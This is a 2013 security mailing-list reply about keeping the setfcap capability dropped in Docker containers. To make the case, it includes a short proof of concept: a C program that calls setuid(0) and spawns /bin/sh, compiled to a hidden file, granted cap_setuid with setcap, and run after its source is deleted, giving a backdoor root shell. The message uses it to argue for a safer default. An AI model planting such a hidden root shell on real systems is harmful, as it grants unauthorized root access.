leaving setfcap in docker containers
"Jóhann B. Guðmundsson"
johannbg at gmail.com
Fri Sep 27 19:33:28 UTC 2013
On 09/27/2013 05:28 PM, Matthew Miller wrote:
>
> We're considering removing setfcap from the list of dropped capabilities. It
> seems safe to me
I dont have any security degrees nor do I consider myself an evil man
and probably Steve and Dan would be better suited to answer this
question since I'm far from being any expert on the subject but
hypothetically would not someone being able to do something like this in
this educational sample I'm providing
cd ~user
vi bd.c
#include <unistd.h>
#include <fcntl.h>
main()
{
setuid(0);
char *name[2];
name[0] = "/bin/sh";
name[1] = 0x0;
execve(name[0], name, 0x0);
return 0;
}
gcc bd.c -o .b
chown user:user .b
chmod 750 .b
setcap cap_setuid=ep
rm bd.c
./.b
if you did?
I personally would recommend we kept it on after all Dan did push for
that feature for a reason but as I said I'm no expert on the topic.
JBG
More information about the security
mailing list